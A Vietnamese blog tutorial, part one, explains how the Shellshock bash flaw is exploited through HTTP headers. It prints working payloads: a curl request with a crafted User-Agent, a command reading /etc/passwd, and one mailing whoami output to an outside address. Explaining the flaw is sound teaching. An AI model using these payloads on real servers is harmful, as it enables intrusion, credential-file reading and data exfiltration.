Inside Shellshock: Cách mà hacker dùng để khai thác hệ thống! (P1)

Shellshock là các ví dụ điển hình trong các lỗ hổng thực thi mã tùy ý trong hệ thống (ACE - Arbitrary Code Execution). Thông thường, tấn côn...

Shellshock là các ví dụ điển hình trong các lỗ hổng thực thi mã tùy ý trong hệ thống (ACE - Arbitrary Code Execution). Thông thường, tấn công vào các lỗ hổng ACE được thực hiện trên các chương trình đang chạy và đòi hỏi sự hiểu biết sâu về việc thực thi mã, memory layout, mã assembly - theo một cách hiểu đơn giản thì cách tấn công này đòi hỏi người tấn công phải có sự hiểu biết nhiều về hệ thống.

Kẻ tấn công sử dụng lỗ hổng ACE để tải lên hoặc chạy một chương trình cung cấp khả năng kiểm soát máy tính mục tiêu, thường được thực hiện bằng cách chạy một shell thực thi. Shell là môt dòng lệnh có thể được nhập vào và thực thi trên hệ thống.
Lỗ hổng Shellshock là một vấn đề lớn bởi nó loại bỏ cung cấp một con đường để dành quyền kiểm soát máy tính mục tiêu và thực thi mã.
Giả định bạn muốn tấn công vào một máy chủ web và khiến cho các ổ đĩa CD hoặc DVD trượt mở ra ngoài, thực sự có một lệnh thực thi trên Linux có thể làm điều đó: /bin/eject .Nếu một máy chủ web dính lổ hổng Shellshock, bạn có thể tấn công nó bằng cách thêm cách chuỗi() { :; }; sau đó là /bin/eject và gửi chuỗi đó đến máy chủ web thông qua HTTP. Thông thường, chuỗi User-Agent sẽ xác định kiểu, loại trình duyệt bạn đang sử dụng, nhưng trong trường hợp máy chủ web dính lổ hổng Shellshock, nó có thể được thay thể và thiết lập để truyền đi bất cứ thứ gì.

Ví dụ, nếu trang victim.com gặp lổ hổng trên, ta có thể sử dụng curl:

curl -H "User-Agent: () { :; }; /bin/eject" http://victim.com/

Nó khiến cho các ổ CD và DVD trượt ra ngoài.

Tại sao nói rằng nó rất đơn giản để tấn công!?

Khi một máy chủ web nhận được yêu cầu cho một trang, có 3 nơi có thể bị tấn công Shellshock: các request URL, các header được gửi cùng URL,và một số arguments.

Ví dụ, đây là một request HTTP để lấy được trang chủ CloudFlare:

GET / HTTP/1.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8,fr;q=0.6
Cache-Control: no-cache
Pragma: no-cache
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
Host: cloudflare.com


Trong trường hợp này URL là / ngay tại trang chính và các header Accept-Encoding, Accept-Language,...nó là các biển phổ biến để máy chủ web kiểm tra.

HTTP_ACCEPT_ENCODING=gzip,deflate,sdch
HTTP_ACCEPT_LANGUAGE=en-US,en;q=0.8,fr;q=0.6
HTTP_CACHE_CONTROL=no-cache
HTTP_PRAGMA=no-cache
HTTP_USER_AGENT=Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
HTTP_HOST=cloudflare.com



Shellshock xảy ra khi các biến đó được truyền vào shell được gọi là "bash". Bash là một shell thường được sử dụng trên các hệ thống Linux. Các máy chủ web thường phải chạy các chương trình khác để responsive các request, và các biến trên được sử dụng rất nhiều trong các shell bash.
Lổ hổng Shellshock xảy ra khi các kẻ tấn công thay đổi các request HTTP chứa các chuỗi biến hóa () { :; };
Giả sử kẻ tấn công thay đổi header User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36

-> User-Agent: () { :; }; /bin/eject

Nó sẽ tạo ra biến bên trong máy chủ web như sau:

HTTP_USER_AGENT=() { :; }; /bin/eject

Thay vì xử lí các biến HTTP_USER_AGENT như là một chuỗi các ký tự không có ý nghĩa đặc biệt, bash sẽ diễn giải nó như là một lệnh cần được thực thi.(Ở đây không nói đến viên tại sao chuỗi kí tự () { :; }; lại khiến cho các bash thực thi được mã lệnh).

Vấn đề là HTTP_USER_AGENT đến từ header User-Agent mà là một cái gì đó điều khiển tấn công vì nó đi kèm trong một request HTTP đến máy chủ web. Và đó là một ​​​​công thức cho kẻ tấn công có thể làm cho một server bị lỗi và chạy bất kỳ lệnh nào mà kẻ tấn công muốn.

Hãy tiến xa hơn...

Khi các máy chủ web đã dễ bị tấn công vào lổ hổng Shellshock và nó sẽ thực thi bất kì mã lệnh nào được gửi đến, các kẻ tấn công sẽ thao tác để điều khiển máy tính từ xa. Shellshock được sử dụng chủ yếu để thăm dò, trích xuất dữ liệu cá nhân và cho phép kẻ tấn công giành quyền kiểm soát máy tính mục tiêu.

Hầu hết các Shellshock được inject vào các header User-Agent và Referer nhưng kẻ tấn công cũng có thể sử dụng GET và các đối số POST và một số header ngẫu nhiên khác.

Để trích xuất thông tin cá nhân của máy chủ, các kẻ tấn công sử dụng một vài kĩ thuật như sau:

() {:;}; /bin/cat /etc/passwd

Nó đọc file password /etc/passwd ,và đó đính kèm vào response từ server trả về client.Vậy là các kẻ tấn công tiêm mã này thông qua các lổ hổng Shellshock và sẽ nhận được tập tin password hiển thị lên màn hình như là một phần trả về của máy chủ web.

Trong trường hợp muốn tấn công vào hệ thống mail private của mục tiêu để get thông tin thông qua mail, kẻ tấn công sử dụng command mail:

() {:;}; /bin/bash -c "whoami | mail -s 'example.com 1' [email protected]"

Lệnh whoami được thực thi trước đó để tìm ra tên của người sử dụng để chạy các máy chủ web. Điều này đặc biệt hữu ích vì nếu là người dùng root thì máy chủ đó thực sự có nhiều thứ đang để khai thác đối với một kẻ tấn công có chủ đích.


Continue()....

COMMENTS

Tên

.:: Connect Trojan ::.,111,.htaccess,2,0-day,3,2017,2,Add-on,16,Affiliate,1,Anotador,1,AutoIT,17,BackDoor,1,Bán Sách,13,banhangonline,1,Bảo Mật,173,Bất Động Sản Tại Tiền Giang,5,Bestsellers,13,Binder,1,blog,31,Blogger,4,Blogger Template,1,Botnet,3,Brute,1,Bug Bounty,1,Bypass,10,camera,1,ceh,1,Châu Tinh Trì,2,Checked,6,Chrome,21,Code,5,coin hive,1,Coin-Hive,2,CoinHive,1,Connect Trojan,342,Connect Trojan ::.,1,Cổ Tích,2,Crack,3,Crypto,5,CSRF,5,CSS,2,Cuộc Sống,1,Dau tu,8,DDoS,6,Designer,1,Dich vụ,1,DNS,4,Download,2,du-an,3,DVD LUMION Tiếng Việt của anh Dũng Già Pro,1,Đam Mỹ,1,điện,1,Đồ Họa,215,Đô Thị,16,e11.me,1,ebook,17,ebook free,295,eBook Phệ Hồn Nghịch Thiên,1,eBook Thịnh Thế Địch Phi,1,Encrypt,1,Encryption,1,epub,76,epub [Tiên hiệp],1,ET-Logger,1,exploit,23,Exploitation,1,Extractor,2,facebook,69,FireFox,15,Flood,2,Forensic,7,full prc,2,game,177,Gerador,3,Gerenciador,1,Get Root,3,GHDB,3,Giả Tưởng,1,giaitri,1,Google,15,H&Y Shop,2,Hacker,3,Hacking,16,Hacking and Security,6,Hacking Tools,36,Hành Động,3,He Thong Site Phim,25,Hijacking,6,Hình Sự,1,hivecoin.hive coin,1,Hỏi Xoáy Đáp Xoay Trên VTV3,1,HTML,1,Huyền Ảo,92,Hướng dẫn Internet cơ bản,1,IFTTT,703,Imgur,2,Infographic,1,Information Disclosure,1,Internet Explorer,3,IT News,39,J2TeaM,29,J2TeaM Tools,9,JavaScript,6,Javascript Injection,3,Juno_okyo's Blog,23,Khóa Học,32,Khóa Học kiếm tiền online với accesstrade,5,khoá học miễn phí,16,Khóa học Photoshop,19,Khóa học sử dụng mã độc và phòng chống mã độc,2,Khoa Huyễn,6,khuyến mãi,16,kiemhiep,9,Kiếm Hiệp,20,Kiếm Tiền MMO,34,kiếm tiền rút gọn link,1,KilerRat,1,Kinh Dị,24,Kinh Dị - Ma,4,Kinh Doanh,73,kinhdi,1,kinhdoanh,5,KRACK Attacks,1,Lãng mạn,1,lazada,1,Lập trình,2,Lịch Sử,5,Linux,1,Local Attack,2,Logins/Cadastro,1,Lỗi Web,1,Lược Sử Hacker,2,Mã Giảm Giá,2,Mã Hóa,48,Malware,3,Master-Code,31,Máy Tính,1,Metasploit,2,Microsoft,4,mobile hacking,2,monero,1,Movie,25,MySQL,1,NEW PRODUCTS,19,NGHỆ THUẬT ẨN MÌNH,13,ngontinh,10,Ngôn Tình,151,nhà đất,1,Nhà Đất Gò Công,1,Nhân Vật Lịch Sử,2,Nhật Bản,1,Nhựt Trường Group,1,NjRat,5,Nước,1,open redirect,1,Oracle,1,Path Disclosure,2,pdf,76,Pen-Test,6,Pentest Box,9,Phan mem Internet,1,phanmem,23,phanmemdienthoai,3,phanmemmaytinh,10,phần mềm,11,Phim 18,2,Phim 2012,1,Phim 3D,1,Phim Âm Nhạc,2,Phim Bộ,39,Phim Chiến Tranh,5,Phim Dã Sử - Cổ Trang,6,Phim Đài Loan,6,Phim Đề Cử,4,Phim Hài Hước,26,Phim Hàn Quốc,33,Phim HD Chất Lượng Cao,5,Phim Hoạt Hình,2,Phim Hot,1,Phim Hồng Kông,20,Phim HQ,2,Phim Kinh Dị,8,Phim lẻ,4,Phim Mới 2011,2,Phim Mới 2012,1,Phim Mới 2015,1,Phim Nhật Bản,4,Phim SD,3,Phim Thái Lan,6,Phim Thần Thoại,4,Phim Tình Cảm,35,Phim Trung Quốc,37,Phim Truyền Hình,19,Phim Viễn Tưởng,1,Phim Võ Thuật,36,Phim Xã Hội Đen,1,Phishing,5,PHP,16,Plugin,1,Port,1,post mẫu,1,prc,77,Programming,15,Python,1,Quảng Cáo,1,rat,457,Recovery,3,Remote Code Execution,1,Remote Desktop,1,Reverse Engineering,6,review,3,rút gọn link,1,sach,47,Sách,37,Sách Nghệ Thuật Sống,12,sách nói,1,Sách Tâm Linh,1,Sách Tiếng Anh,2,sachiep,2,Sản Phẩm,1,Sắc Hiệp,16,Scam,1,Scanner,10,Security,66,SEO,5,share,1,Shell,5,shop,1,Social Engineering,4,Software,22,Source Unity,1,SQL injection,21,Sức Khỏe,1,Symlink,3,Tài Chính,1,Tài chính cá nhân,2,Tài Liệu,1,Tản mạn,7,Taudio,2,Tâm lý xã hội,1,tấn công,1,Testador,1,Thái Lan,2,Tham Khảo,3,thamkhao,11,them,1,Thiệp Cưới,1,Thiết Kế Web,30,Thời Trang,2,Thủ Thuật Hacking,53,Thuyết Minh,1,tienhiep,5,Tiên Hiệp,123,Tiểu Thuyết,94,tiki,3,TIL,8,Tin Tức,52,Tips,39,tool,1,Tool Hack,14,Tools,9,Tổng Hợp,1,Tricks,26,Trinh thám,1,trojan original,48,Trọng sinh,11,Trộm mộ,1,Trung Quốc,1,Truyện,1,Trương Định,110,Tu Chân,2,TUTORIALS,124,Twitter,1,Ung_Dung,4,Upload,1,usb,1,vanhoc,11,văn học,6,vBulletin,7,video,16,Vietsub,1,Việt Nam,4,Virus,4,Võ Thuật,3,Võng Du,5,Vulnerability,19,Web Developer,15,webmau,5,WHMCS,3,WiFi,2,wiki lỗi máy tinh,1,wiki lỗi NTG,3,Windows,12,WordPress,43,Write-up,11,XSS,16,Yahoo,1,yeah1offer,1,youtube,11,
ltr
item
NhutTruong.Com - Chia sẻ kiến thức miễn phí: Inside Shellshock: Cách mà hacker dùng để khai thác hệ thống! (P1)
Inside Shellshock: Cách mà hacker dùng để khai thác hệ thống! (P1)
NhutTruong.Com - Chia sẻ kiến thức miễn phí
https://www.nhuttruong.com/2016/10/inside-shellshock-cach-ma-hacker-dung-e_25.html
https://www.nhuttruong.com/
https://www.nhuttruong.com/
https://www.nhuttruong.com/2016/10/inside-shellshock-cach-ma-hacker-dung-e_25.html
true
7607280272436897486
UTF-8
Loaded All Posts Not found any posts VIEW ALL Readmore Reply Cancel reply Delete By Home PAGES POSTS View All RECOMMENDED FOR YOU LABEL ARCHIVE SEARCH ALL POSTS Not found any post match with your request Back Home Sunday Monday Tuesday Wednesday Thursday Friday Saturday Sun Mon Tue Wed Thu Fri Sat January February March April May June July August September October November December Jan Feb Mar Apr May Jun Jul Aug Sep Oct Nov Dec just now 1 minute ago $$1$$ minutes ago 1 hour ago $$1$$ hours ago Yesterday $$1$$ days ago $$1$$ weeks ago more than 5 weeks ago Followers Follow THIS PREMIUM CONTENT IS LOCKED STEP 1: Share to a social network STEP 2: Click the link on your social network Copy All Code Select All Code All codes were copied to your clipboard Can not copy the codes / texts, please press [CTRL]+[C] (or CMD+C with Mac) to copy Table of Content